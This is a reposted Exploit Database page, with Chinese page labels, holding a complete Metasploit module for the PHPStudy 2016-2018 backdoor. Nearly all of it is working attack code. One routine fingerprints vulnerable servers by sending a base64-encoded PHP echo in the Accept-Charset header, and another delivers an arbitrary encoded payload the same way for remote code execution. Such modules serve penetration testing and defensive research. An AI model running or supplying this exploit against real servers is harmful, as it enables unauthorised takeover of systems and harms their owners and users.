PHPStudy – Backdoor Remote Code execution (Metasploit)

• Exploit Database
• 17 阅读

• 作者： Metasploit
  日期： 2020-03-10
• 类别：

  • remote
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/48192/

• ##
  # This module requires Metasploit: https://metasploit.com/download
  # Current source: https://github.com/rapid7/metasploit-framework
  ##
  
  class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  
  include Msf::Exploit::Remote::HttpClient
  
  def initialize(info={})
  super(update_info(info,
  'Name' => "PHPStudy Backdoor Remote Code execution",
  'Description'=> %q{
  This module can detect and exploit the backdoor of PHPStudy.
  },
  'License'=> MSF_LICENSE,
  'Author' =>
  [
  'Dimensional',#POC
  'Airevan' #Metasploit Module
  ],
  'Platform' => ['php'],
  'Arch' => ARCH_PHP,
  'Targets'=>
  [
  ['PHPStudy 2016-2018', {}]
  ],
  'References'=>
  [
  ['URL', 'https://programmer.group/using-ghidra-to-analyze-the-back-door-of-phpstudy.html']
  ],
  'Privileged' => false,
  'DisclosureDate' => "Sep 20 2019",
  'DefaultTarget'=> 0
  ))
  
  register_options(
  [
  OptString.new('TARGETURI', [true, 'The base path', '/'])
  ])
  end
  def check
  uri = target_uri.path
  fingerprint = Rex::Text.rand_text_alpha(8)
  res = send_request_cgi({
  'method'=>'GET',
  'uri' =>normalize_uri(uri, 'index.php'),
  'headers' =>{
  'Accept-Encoding' =>'gzip,deflate',
  'Accept-Charset'=>Rex::Text.encode_base64("echo '#{fingerprint}';")
  }
  })
  
  if res && res.code == 200 && res.body.to_s.include?(fingerprint)
  return Exploit::CheckCode::Appears
  else
  return Exploit::CheckCode::Safe
  end
  end
  def exploit
  uri = target_uri.path
  print_good("Sending shellcode")
  res = send_request_cgi({
  'method'=> 'GET',
  'uri' => normalize_uri(uri, 'index.php'),
  'headers' => {
  'Accept-Encoding' => 'gzip,deflate',
  'Accept-Charset'=> Rex::Text.encode_base64(payload.encoded)
  }
  })
  end
  end